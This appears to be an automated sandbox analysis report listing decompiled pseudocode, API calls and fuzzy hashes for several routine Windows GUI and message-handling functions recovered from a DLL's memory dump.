				if( *((intOrPtr*)(_t101 - 0x54)) == 0) {
					goto L6;
				}
				 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
				_t98 =  *((intOrPtr*)(_t101 - 0x54));
				if( *(_t101 - 0x14) != 0) {
					_push( *((intOrPtr*)(_t101 - 0x18)));
					_push(0);
					E1001D714();
				}
				_t59 = _t98;
				goto L22;
			}

0x1002f23f
0x1002f23f
0x1002f246
0x1002f254
0x1002f25d
0x1002f26a
0x1002f26d
0x1002f394
0x1002f394
0x1002f398
0x1002f39b
0x1002f39d
0x1002f3a0
0x1002f3a1
0x1002f3a1
0x1002f3a6
0x1002f3a6
0x1002f3a8
0x1002f3ad
0x1002f3ad
0x1002f279
0x1002f2c6
0x1002f2c9
0x1002f2cf
0x00000000
0x00000000
0x1002f2d5
0x1002f2dc
0x1002f2e2
0x1002f2e7
0x1002f2e9
0x1002f2ec
0x1002f2ef
0x1002f2f1
0x1002f2f8
0x1002f304
0x1002f306
0x1002f308
0x00000000
0x00000000
0x1002f315
0x1002f321
0x1002f326
0x1002f32b
0x1002f32e
0x1002f330
0x1002f333
0x1002f335
0x00000000
0x00000000
0x1002f352
0x1002f355
0x1002f358
0x1002f35e
0x1002f361
0x1002f366
0x1002f366
0x1002f368
0x1002f36b
0x1002f370
0x1002f370
0x1002f372
0x1002f375
0x1002f37a
0x1002f37a
0x1002f37c
0x1002f382
0x1002f385
0x1002f388
0x1002f38a
0x1002f38a
0x00000000
0x1002f388
0x1002f2f3
0x1002f2f3
0x00000000
0x1002f2f3
0x1002f27e
0x1002f287
0x1002f28e
0x1002f291
0x1002f294
0x1002f297
0x1002f29a
0x1002f29d
0x1002f2a0
0x1002f2a8
0x00000000
0x00000000
0x1002f2aa
0x1002f2b1
0x1002f2b4
0x1002f2b6
0x1002f2b9
0x1002f2ba
0x1002f2ba
0x1002f2bf
0x00000000

APIs

__EH_prolog3.LIBCMT ref: 1002F246
VariantClear.OLEAUT32(?), ref: 1002F2DC
_memset.LIBCMT ref: 1002F315
_memset.LIBCMT ref: 1002F321
SysFreeString.OLEAUT32(?), ref: 1002F366
SysFreeString.OLEAUT32(?), ref: 1002F370
SysFreeString.OLEAUT32(?), ref: 1002F37A

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: FreeString$_memset$ClearH_prolog3Variant
String ID:
API String ID: 3574576181-0
Opcode ID: 0c5c79690934b08080de730fa962a6b528dd591dd951afd2560f228c1dd8ac82
Instruction ID: 03b1f9187570ac732a2ad0fd53828fbe430a56604cb9a184f68fd8707445ec45
Opcode Fuzzy Hash: 0c5c79690934b08080de730fa962a6b528dd591dd951afd2560f228c1dd8ac82
Instruction Fuzzy Hash: 92413975901219EFCB01DFA4C8459EEBBB9FF45B90F50822AF019AA151C770AA81CF90

Uniqueness

Uniqueness Score: -1.00%

Function 10013B72 Relevance: 10.6, APIs: 7, Instructions: 115
windowCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E10013B72(intOrPtr* __ecx, signed int _a4) {
				struct HWND__* _v4;
				struct tagMSG* _v8;
				int _v12;
				int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t42;
				struct tagMSG* _t43;
				signed int _t45;
				void* _t48;
				void* _t50;
				int _t53;
				long _t56;
				signed int _t62;
				intOrPtr* _t64;
				intOrPtr* _t67;
				void* _t68;

				_t63 = __ecx;
				_t62 = 1;
				_t67 = __ecx;
				_v12 = 1;
				_v16 = 0;
				if((_a4 & 0x00000004) == 0 || (E100177F8(__ecx) & 0x10000000) != 0) {
					_t62 = 0;
				}
				_t42 = GetParent( *(_t67 + 0x20));
				 *(_t67 + 0x3c) =  *(_t67 + 0x3c) | 0x00000018;
				_v4 = _t42;
				_t43 = E10019F1B(0);
				_t68 = UpdateWindow;
				_v8 = _t43;
				while(1) {
					L14:
					_t73 = _v12;
					if(_v12 == 0) {
						goto L15;
					}
					__eflags = PeekMessageA(_v8, 0, 0, 0, 0);
					if(__eflags != 0) {
						while(1) {
							L15:
							_t45 = E1001A4C2(_t63, 0, _t67, _t73);
							if(_t45 == 0) {
								break;
							}
							if(_t62 != 0) {
								_t53 = _v8->message;
								if(_t53 == 0x118 || _t53 == 0x104) {
									E1001793D(_t67, 1);
									UpdateWindow( *(_t67 + 0x20));
									_t62 = 0;
								}
							}
							_t64 = _t67;
							_t48 =  *((intOrPtr*)( *_t67 + 0x80))();
							_t79 = _t48;
							if(_t48 == 0) {
								_t39 = _t67 + 0x3c;
								 *_t39 =  *(_t67 + 0x3c) & 0xffffffe7;
								__eflags =  *_t39;
								return  *((intOrPtr*)(_t67 + 0x44));
							} else {
								_t50 = E1001A352(_t62, _t64, 0, _t67, _t68, _t79, _v8);
								_pop(_t63);
								if(_t50 != 0) {
									_v12 = 1;
									_v16 = 0;
								}
								if(PeekMessageA(_v8, 0, 0, 0, 0) != 0) {
									continue;
								} else {
									goto L14;
								}
							}
						}
						_push(0);
						E1001935C();
						return _t45 | 0xffffffff;
					}
					__eflags = _t62;
					if(_t62 != 0) {
						_t63 = _t67;
						E1001793D(_t67, 1);
						UpdateWindow( *(_t67 + 0x20));
						_t62 = 0;
						__eflags = 0;
					}
					__eflags = _a4 & 0x00000001;
					if((_a4 & 0x00000001) == 0) {
						__eflags = _v4;
						if(_v4 != 0) {
							__eflags = _v16;
							if(_v16 == 0) {
								SendMessageA(_v4, 0x121, 0,  *(_t67 + 0x20));
							}
						}
					}
					__eflags = _a4 & 0x00000002;
					if(__eflags != 0) {
						L13:
						_v12 = 0;
						continue;
					} else {
						_t56 = SendMessageA( *(_t67 + 0x20), 0x36a, 0, _v16);
						_v16 = _v16 + 1;
						__eflags = _t56;
						if(__eflags != 0) {
							continue;
						}
						goto L13;
					}
				}
				goto L15;
			}

0x10013b72
0x10013b7b
0x10013b83
0x10013b85
0x10013b89
0x10013b8d
0x10013b9b
0x10013b9b
0x10013ba0
0x10013ba6
0x10013baa
0x10013bae
0x10013bb3
0x10013bb9
0x10013c31
0x10013c31
0x10013c31
0x10013c35
0x00000000
0x00000000
0x10013bcd
0x10013bcf
0x10013c37
0x10013c37
0x10013c37
0x10013c3e
0x00000000
0x00000000
0x10013c42
0x10013c48
0x10013c50
0x10013c5d
0x10013c65
0x10013c67
0x10013c67
0x10013c50
0x10013c6b
0x10013c6d
0x10013c73
0x10013c75
0x10013cb0
0x10013cb0
0x10013cb0
0x00000000
0x10013c77
0x10013c7b
0x10013c82
0x10013c83
0x10013c85
0x10013c8d
0x10013c8d
0x10013ca1
0x00000000
0x10013ca3
0x00000000
0x10013ca3
0x10013ca1
0x10013c75
0x10013ca5
0x10013ca6
0x00000000
0x10013cab
0x10013bd1
0x10013bd3
0x10013bd7
0x10013bd9
0x10013be1
0x10013be3
0x10013be3
0x10013be3
0x10013be5
0x10013bea
0x10013bec
0x10013bf0
0x10013bf2
0x10013bf6
0x10013c05
0x10013c05
0x10013bf6
0x10013bf0
0x10013c0b
0x10013c10
0x10013c2d
0x10013c2d
0x00000000
0x10013c12
0x10013c1f
0x10013c25
0x10013c29
0x10013c2b
0x00000000
0x00000000
0x00000000
0x10013c2b
0x10013c10
0x00000000

APIs

GetParent.USER32(00000004), ref: 10013BA0
PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 10013BC7
UpdateWindow.USER32 ref: 10013BE1
SendMessageA.USER32 ref: 10013C05
SendMessageA.USER32 ref: 10013C1F
UpdateWindow.USER32 ref: 10013C65
PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 10013C99

Part of subcall function 100177F8: GetWindowLongA.USER32(?,000000F0), ref: 10017803

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Message$Window$PeekSendUpdate$LongParent
String ID:
API String ID: 2853195852-0
Opcode ID: c3e276bd65efa7df5bba1a0d96a9bb273c94ca5dcf2f5af77d8346f14572e0c2
Instruction ID: bcd71ec54be47078b87aecd0e4f52c04ce37c12de65d41b37e9f73b1c2401c47
Opcode Fuzzy Hash: c3e276bd65efa7df5bba1a0d96a9bb273c94ca5dcf2f5af77d8346f14572e0c2
Instruction Fuzzy Hash: 1A41C0306047819BD711CF258988E5BBBF4FFC5B84F00892CF492A9061D772D884CB92

Uniqueness

Uniqueness Score: -1.00%

Function 10019E81 Relevance: 10.6, APIs: 7, Instructions: 111
windowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E10019E81(int __ebx, long __ecx, struct HWND__* __edi) {
				long _v4;
				char _v28;
				intOrPtr _v40;
				void* __esi;
				void* __ebp;
				long _t20;
				long _t21;
				struct HWND__* _t22;
				long _t23;
				struct HWND__* _t24;
				long _t25;
				struct HWND__* _t26;
				void* _t33;
				void* _t35;
				long _t39;
				long _t41;
				intOrPtr _t43;
				struct HWND__* _t47;
				struct HWND__* _t49;
				long _t51;
				long _t53;

				_t46 = __edi;
				_t39 = __ecx;
				_t37 = __ebx;
				if( *((intOrPtr*)(__ecx + 0x78)) == 0) {
					_t51 = L10012730();
					__eflags = _t51;
					if(_t51 != 0) {
						_t20 =  *((intOrPtr*)( *_t51 + 0x120))();
						__eflags = _t20;
						_t41 = _t51;
						_pop(_t52);
						if(_t20 != 0) {
							_t53 = _t41;
							_t21 =  *(_t53 + 0x64);
							__eflags = _t21;
							if(_t21 == 0) {
								_pop(_t52);
								goto L12;
							} else {
								__eflags = _t21 - 0x3f107;
								if(__eflags != 0) {
									_t35 = E1001E302(__ebx, __edi, _t53, __eflags);
									_t21 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t35 + 4)))) + 0xac))( *(_t53 + 0x64), 1);
								}
								return _t21;
							}
						} else {
							L12:
							_push(_t41);
							_push(_t37);
							_push(0);
							_push(_t52);
							_push(_t46);
							_v4 = _t41;
							_t22 = GetCapture();
							_t51 = SendMessageA;
							_t37 = 0x365;
							while(1) {
								_t47 = _t22;
								__eflags = _t47;
								if(_t47 == 0) {
									break;
								}
								_t23 = SendMessageA(_t47, _t37, 0, 0);
								__eflags = _t23;
								if(__eflags != 0) {
									L27:
									return _t23;
								} else {
									_t22 = E100158CD(_t41, _t47, __eflags, _t47);
									continue;
								}
								goto L33;
							}
							_t24 = GetFocus();
							while(1) {
								_t46 = _t24;
								__eflags = _t46;
								if(_t46 == 0) {
									break;
								}
								_t23 = SendMessageA(_t46, _t37, 0, 0);
								__eflags = _t23;
								if(__eflags != 0) {
									goto L27;
								} else {
									_t24 = E100158CD(_t41, _t46, __eflags, _t46);
									continue;
								}
								goto L33;
							}
							_t39 = _v4;
							_t25 = E10015912(_t37, _t39, _t46);
							__eflags = _t25;
							if(_t25 != 0) {
								_t26 = GetLastActivePopup( *(_t25 + 0x20));
								while(1) {
									_t49 = _t26;
									__eflags = _t49;
									_push(0);
									if(_t49 == 0) {
										break;
									}
									_t23 = SendMessageA(_t49, _t37, 0, ??);
									__eflags = _t23;
									if(__eflags == 0) {
										_t26 = E100158CD(_t39, _t49, __eflags, _t49);
										continue;
									}
									goto L27;
								}
								_t23 = SendMessageA( *(_v4 + 0x20), 0x111, 0xe147, ??);
								goto L27;
							} else {
								goto L1;
							}
						}
					} else {
						L1:
						_push(0);
						_push(_t39);
						_v28 = 0x100b8618;
						L10048E48( &_v28, 0x100aff30);
						asm("int3");
						_push(4);
						E1004764D(0x1008dd26, _t37, _t46, _t51);
						_t43 = E10020454(0x104);
						_v40 = _t43;
						_t33 = 0;
						_v28 = 0;
						if(_t43 != 0) {
							_t33 = E1001DB72(_t43);
						}
						return E10047725(_t33);
					}
				} else {
					__eflags = __eax - 0x3f107;
					if(__eax != 0x3f107) {
						return  *((intOrPtr*)( *__ecx + 0xac))(__eax, 1);
					}
					return __eax;
				}
				L33:
			}

0x10019e81
0x10019e81
0x10019e81
0x10019e86
0x10019ea1
0x10019ea3
0x10019ea5
0x10019eb0
0x10019eb6
0x10019eb8
0x10019eba
0x10019ebb
0x10026f0a
0x10026f0c
0x10026f0f
0x10026f11
0x10026f33
0x00000000
0x10026f13
0x10026f13
0x10026f18
0x10026f1a
0x10026f2b
0x10026f2b
0x10026f32
0x10026f32
0x10019ebd
0x10026e6b
0x10026e6b
0x10026e6c
0x10026e6d
0x10026e6e
0x10026e6f
0x10026e70
0x10026e74
0x10026e7a
0x10026e80
0x10026e99
0x10026e99
0x10026e9b
0x10026e9d
0x00000000
0x00000000
0x10026e8d
0x10026e8f
0x10026e91
0x10026f03
0x10026f08
0x10026e93
0x10026e94
0x00000000
0x10026e94
0x00000000
0x10026e91
0x10026e9f
0x10026eb7
0x10026eb7
0x10026eb9
0x10026ebb
0x00000000
0x00000000
0x10026eab
0x10026ead
0x10026eaf
0x00000000
0x10026eb1
0x10026eb2
0x00000000
0x10026eb2
0x00000000
0x10026eaf
0x10026ebd
0x10026ec1
0x10026ec6
0x10026ec8
0x10026ed2
0x10026ee9
0x10026ee9
0x10026eeb
0x10026eed
0x10026eee
0x00000000
0x00000000
0x10026edd
0x10026edf
0x10026ee1
0x10026ee4
0x00000000
0x10026ee4
0x00000000
0x10026ee1
0x10026f01
0x00000000
0x10026eca
0x00000000
0x10026eca
0x10026ec8
0x10019ea7
0x1000a069
0x1000a069
0x1000a06c
0x1000a076
0x1000a07d
0x1000a082
0x1000a083
0x1000a08a
0x1000a099
0x1000a09b
0x1000a09e
0x1000a0a2
0x1000a0a5
0x1000a0a7
0x1000a0a7
0x1000a0b1
0x1000a0b1
0x10019e88
0x10019e88
0x10019e8d
0x00000000
0x10019e94
0x10019e9a
0x10019e9a
0x00000000

APIs

GetCapture.USER32 ref: 10026E74
SendMessageA.USER32 ref: 10026E8D
GetFocus.USER32 ref: 10026E9F
SendMessageA.USER32 ref: 10026EAB
GetLastActivePopup.USER32(?), ref: 10026ED2
SendMessageA.USER32 ref: 10026EDD
SendMessageA.USER32 ref: 10026F01

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: MessageSend$ActiveCaptureFocusLastPopup
String ID:
API String ID: 3219385341-0
Opcode ID: 0f9cf2f9a770d9057ca46717b984a156014cd5c889fc452cf32eb1698ca24344
Instruction ID: c83883cea261492dbcc6de6b44b63371930bd8a8e6fe2a30bc088c65533c2fe6
Opcode Fuzzy Hash: 0f9cf2f9a770d9057ca46717b984a156014cd5c889fc452cf32eb1698ca24344
Instruction Fuzzy Hash: 4B312179704216EBDE21EB24EC84DAF76ECEF8A6C5B170479F800CB211CB32DC4196A1

Uniqueness

Uniqueness Score: -1.00%

Function 10014118 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10014118(intOrPtr* __ecx) {
				struct HWND__* _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t43;
				struct HWND__* _t48;
				long _t61;
				intOrPtr* _t63;
				signed int _t64;
				void* _t69;
				intOrPtr _t71;
				intOrPtr* _t72;

				_t72 = __ecx;
				_t69 = E10019F12();
				if(_t69 != 0) {
					if( *((intOrPtr*)(_t69 + 0x20)) == __ecx) {
						 *((intOrPtr*)(_t69 + 0x20)) = 0;
					}
					if( *((intOrPtr*)(_t69 + 0x24)) == _t72) {
						 *((intOrPtr*)(_t69 + 0x24)) = 0;
					}
				}
				_t63 =  *((intOrPtr*)(_t72 + 0x48));
				if(_t63 != 0) {
					 *((intOrPtr*)( *_t63 + 0x50))();
					 *((intOrPtr*)(_t72 + 0x48)) = 0;
				}
				_t64 =  *(_t72 + 0x4c);
				if(_t64 != 0) {
					 *((intOrPtr*)( *_t64 + 4))(1);
				}
				 *(_t72 + 0x4c) =  *(_t72 + 0x4c) & 0x00000000;
				_t83 =  *(_t72 + 0x3c) & 1;
				if(( *(_t72 + 0x3c) & 1) != 0) {
					_t71 =  *((intOrPtr*)(E1001E375(1, _t64, _t69, _t72, _t83) + 0x3c));
					if(_t71 != 0) {
						_t85 =  *(_t71 + 0x20);
						if( *(_t71 + 0x20) != 0) {
							E10049170(_t71,  &_v52, 0, 0x30);
							_t48 =  *(_t72 + 0x20);
							_v44 = _t48;
							_v40 = _t48;
							_v52 = 0x28;
							_v48 = 1;
							SendMessageA( *(_t71 + 0x20), 0x405, 0,  &_v52);
						}
					}
				}
				_t61 = GetWindowLongA( *(_t72 + 0x20), 0xfffffffc);
				E10013F46(_t61, _t72, GetWindowLongA, _t85);
				if(GetWindowLongA( *(_t72 + 0x20), 0xfffffffc) == _t61) {
					_t43 =  *( *((intOrPtr*)( *_t72 + 0xf0))());
					if(_t43 != 0) {
						SetWindowLongA( *(_t72 + 0x20), 0xfffffffc, _t43);
					}
				}
				E10014064(_t61, _t72);
				return  *((intOrPtr*)( *_t72 + 0x114))();
			}

0x10014121
0x10014128
0x1001412e
0x10014133
0x10014158
0x10014158
0x1001415e
0x10014160
0x10014160
0x1001415e
0x10014163
0x10014168
0x1001416c
0x1001416f
0x1001416f
0x10014172
0x1001417a
0x1001417f
0x1001417f
0x10014182
0x10014186
0x10014189
0x10014190
0x10014195
0x10014197
0x1001419b
0x100141a5
0x100141aa
0x100141b0
0x100141b3
0x100141c4
0x100141cb
0x100141ce
0x100141ce
0x1001419b
0x10014195
0x100141e4
0x100141e6
0x100141f5
0x10014201
0x10014205
0x1001420d
0x1001420d
0x10014205
0x10014215
0x10014228

APIs

_memset.LIBCMT ref: 100141A5
SendMessageA.USER32 ref: 100141CE
GetWindowLongA.USER32(?,000000FC), ref: 100141E0
GetWindowLongA.USER32(?,000000FC), ref: 100141F1
SetWindowLongA.USER32 ref: 1001420D

Strings

(, xrefs: 100141C4

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: LongWindow$MessageSend_memset
String ID: (
API String ID: 2997958587-3887548279
Opcode ID: 6b22b949b9ce932dd13ac654eb79d8cff91feb19b65ffa35852a87b5f37b679d
Instruction ID: c82c6814ec38e1b5b6b101697f8324302a63334789065a76628bdfc54f8d4eea
Opcode Fuzzy Hash: 6b22b949b9ce932dd13ac654eb79d8cff91feb19b65ffa35852a87b5f37b679d
Instruction Fuzzy Hash: 5031B074A00711AFDB10DFB4C888A9EB7E8FF48650B13056DF5529B6A1DB30E880CB90

Uniqueness

Uniqueness Score: -1.00%

Function 10043D2F Relevance: 10.6, APIs: 7, Instructions: 69
windowCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E10043D2F(void* __ecx) {
				struct tagMSG _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t21;
				intOrPtr _t24;
				int _t31;
				intOrPtr _t33;
				void* _t38;
				void* _t39;
				int _t40;

				_push(0);
				_t39 = __ecx;
				_t40 = 0xf;
				while(PeekMessageA( &_v28, 0, _t40, _t40, ??) != 0) {
					_t21 = GetMessageA( &_v28, 0, _t40, _t40);
					__eflags = _t21;
					if(__eflags != 0) {
						DispatchMessageA( &_v28);
						_push(0);
						continue;
					}
					return _t21;
				}
				_t24 =  *((intOrPtr*)(_t39 + 0x68));
				_t36 =  *((intOrPtr*)(_t24 + 0x84));
				 *((intOrPtr*)(_t39 + 0x70)) =  *((intOrPtr*)(_t24 + 0x84));
				 *(_t39 + 0x78) =  *(_t24 + 0x80) & 0x0000f000;
				SetRectEmpty(_t39 + 0xc);
				 *((intOrPtr*)(_t39 + 0x20)) = 0;
				 *((intOrPtr*)(_t39 + 0x1c)) = 0;
				 *((intOrPtr*)(_t39 + 0x24)) = 0;
				 *((intOrPtr*)(_t39 + 0x7c)) = 0;
				 *((intOrPtr*)(_t39 + 0x80)) = 0;
				_t38 = E10013FEA(0,  *((intOrPtr*)(_t24 + 0x84)), _t40, GetDesktopWindow());
				_t31 = LockWindowUpdate( *(_t38 + 0x20));
				_t43 = _t31;
				if(_t31 == 0) {
					_push(3);
				} else {
					_push(0x403);
				}
				_push(GetDCEx( *(_t38 + 0x20), 0, ??));
				_t33 = L1000CCCE(0, _t36, _t38, _t39, _t43);
				 *((intOrPtr*)(_t39 + 0x84)) = _t33;
				return _t33;
			}

0x10043d3e
0x10043d41
0x10043d43
0x10043d68
0x10043d4e
0x10043d54
0x10043d56
0x10043d61
0x10043d67
0x00000000
0x10043d67
0x10043ded
0x10043ded
0x10043d76
0x10043d79
0x10043d7f
0x10043d8d
0x10043d94
0x10043d9a
0x10043d9d
0x10043da0
0x10043da3
0x10043da6
0x10043db8
0x10043dbd
0x10043dc3
0x10043dc5
0x10043dce
0x10043dc7
0x10043dc7
0x10043dc7
0x10043dda
0x10043ddb
0x10043de0
0x00000000

APIs

GetMessageA.USER32 ref: 10043D4E
DispatchMessageA.USER32 ref: 10043D61
PeekMessageA.USER32(00000000,00000000,0000000F,0000000F,00000000), ref: 10043D70
SetRectEmpty.USER32(?), ref: 10043D94
GetDesktopWindow.USER32 ref: 10043DAC
LockWindowUpdate.USER32(?), ref: 10043DBD
GetDCEx.USER32 ref: 10043DD4

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Message$Window$DesktopDispatchEmptyLockPeekRectUpdate
String ID:
API String ID: 1192691108-0
Opcode ID: 84d8b26e7ebad14b7531b127a920c320bb276a2296806e924b7d622da3e51ed5
Instruction ID: 839274ef87aa8f2479dcd51d4f325cfe662143961794ff2ef2d296bc339d2c34
Opcode Fuzzy Hash: 84d8b26e7ebad14b7531b127a920c320bb276a2296806e924b7d622da3e51ed5
Instruction Fuzzy Hash: B5214DB2900705AFE3109F65CD88E97BBECFB09255F41497EF556C6520DB35E8048B20

Uniqueness

Uniqueness Score: -1.00%

Function 1000F232 Relevance: 10.6, APIs: 7, Instructions: 67
windowCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E1000F232(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t34;
				void* _t36;
				void* _t50;
				void* _t68;
				void* _t70;
				void* _t71;

				_push(0x18);
				_t34 = E1004764D(0x1008e378, __ebx, __edi, __esi);
				_t70 = __ecx;
				_t73 =  *(_t71 + 8) - 0xffffffff;
				if( *(_t71 + 8) != 0xffffffff) {
					_t36 = E1001FDD8(__ebx, __edi, __ecx, _t73);
					GetClientRect( *(_t70 + 0x20), _t71 - 0x24);
					 *(_t71 - 0x10) =  *(_t71 - 0x10) & 0x00000000;
					 *((intOrPtr*)(_t71 - 0x14)) = 0x1009b784;
					 *(_t71 - 4) =  *(_t71 - 4) & 0x00000000;
					L1000CFA3(_t71 - 0x14, __edi, _t71, CreateRectRgnIndirect(_t71 - 0x24));
					_push(GetDC( *(_t70 + 0x20)));
					_t68 = L1000CCCE(_t36, _t71 - 0x14, __edi, _t70, _t73);
					L1000C878(_t68, _t71 - 0x14);
					SendMessageA( *(_t70 + 0x20), 0x198,  *(_t71 + 8), _t71 - 0x24);
					 *(_t71 - 0x20) =  *(_t71 - 0x20) - 2;
					 *((intOrPtr*)(_t71 - 0x18)) =  *(_t71 - 0x20) + 2;
					_t50 = E1000D13A(_t68, _t36);
					PatBlt( *(_t68 + 4),  *(_t71 - 0x24),  *(_t71 - 0x20),  *((intOrPtr*)(_t71 - 0x1c)) -  *(_t71 - 0x24),  *((intOrPtr*)(_t71 - 0x18)) -  *(_t71 - 0x20), 0x5a0049);
					E1000D13A(_t68, _t50);
					ReleaseDC( *(_t70 + 0x20),  *(_t68 + 4));
					 *(_t71 - 4) =  *(_t71 - 4) | 0xffffffff;
					 *((intOrPtr*)(_t71 - 0x14)) = 0x10098308;
					_t34 = L1000CFF6(_t71 - 0x14);
				}
				return E10047725(_t34);
			}

0x1000f232
0x1000f239
0x1000f23e
0x1000f240
0x1000f244
0x1000f24a
0x1000f258
0x1000f25e
0x1000f262
0x1000f269
0x1000f27b
0x1000f289
0x1000f28f
0x1000f297
0x1000f2ab
0x1000f2b4
0x1000f2be
0x1000f2c1
0x1000f2e4
0x1000f2ed
0x1000f2f8
0x1000f2fe
0x1000f305
0x1000f30c
0x1000f30c
